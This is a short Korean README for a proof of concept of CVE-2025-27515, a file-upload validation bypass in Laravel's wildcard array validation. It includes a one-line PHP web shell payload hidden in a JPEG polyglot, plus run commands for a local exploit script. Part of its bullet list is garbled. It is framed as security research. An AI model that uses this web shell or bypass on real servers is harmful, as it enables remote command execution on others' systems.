
CVE-2025-27515의 PoC
Laravel 프레임워크(≤ 12.0.0)의 파일 업로드 검증 우회 취약점인 CVE-2025-27515에 대한 실용적인 시연입니다.
CVE-2025-27515는 Laravel 애플리케이션이 와일드카드 검증 패턴(files.*)을 사용할 때 공격자가 파일 업로드 제한을 우회할 수 있게 하는 검증 우회 취약점입니다. 이 취약점은 Laravel이 배열 기반 파일 업로드를 처리하는 방식의 약점을 악용하여 악성 파일을 업로드할 수 있게 합니다.
심각도: 중간/높음
CWE: CWE-20 (부적절한 입력 검증)
이 익스플로잇은 다음과 같은 폴리글롯 JPEG+PHP 파일을 사용합니다:
FF D8 FF E0)를 포함합니다<?php system($_GET['cmd']); ?>)를 포함합니다.jpg 확장자를 사용합니다php artisan serve
# Access at http://localhost:8000/upload
Python 버전:
pip3 install -r requirements.txt
python3 exploit.py http://localhost:8000
교육 및 승인된 보안 테스트 전용
By Guaxinim | 사이버 보안 연구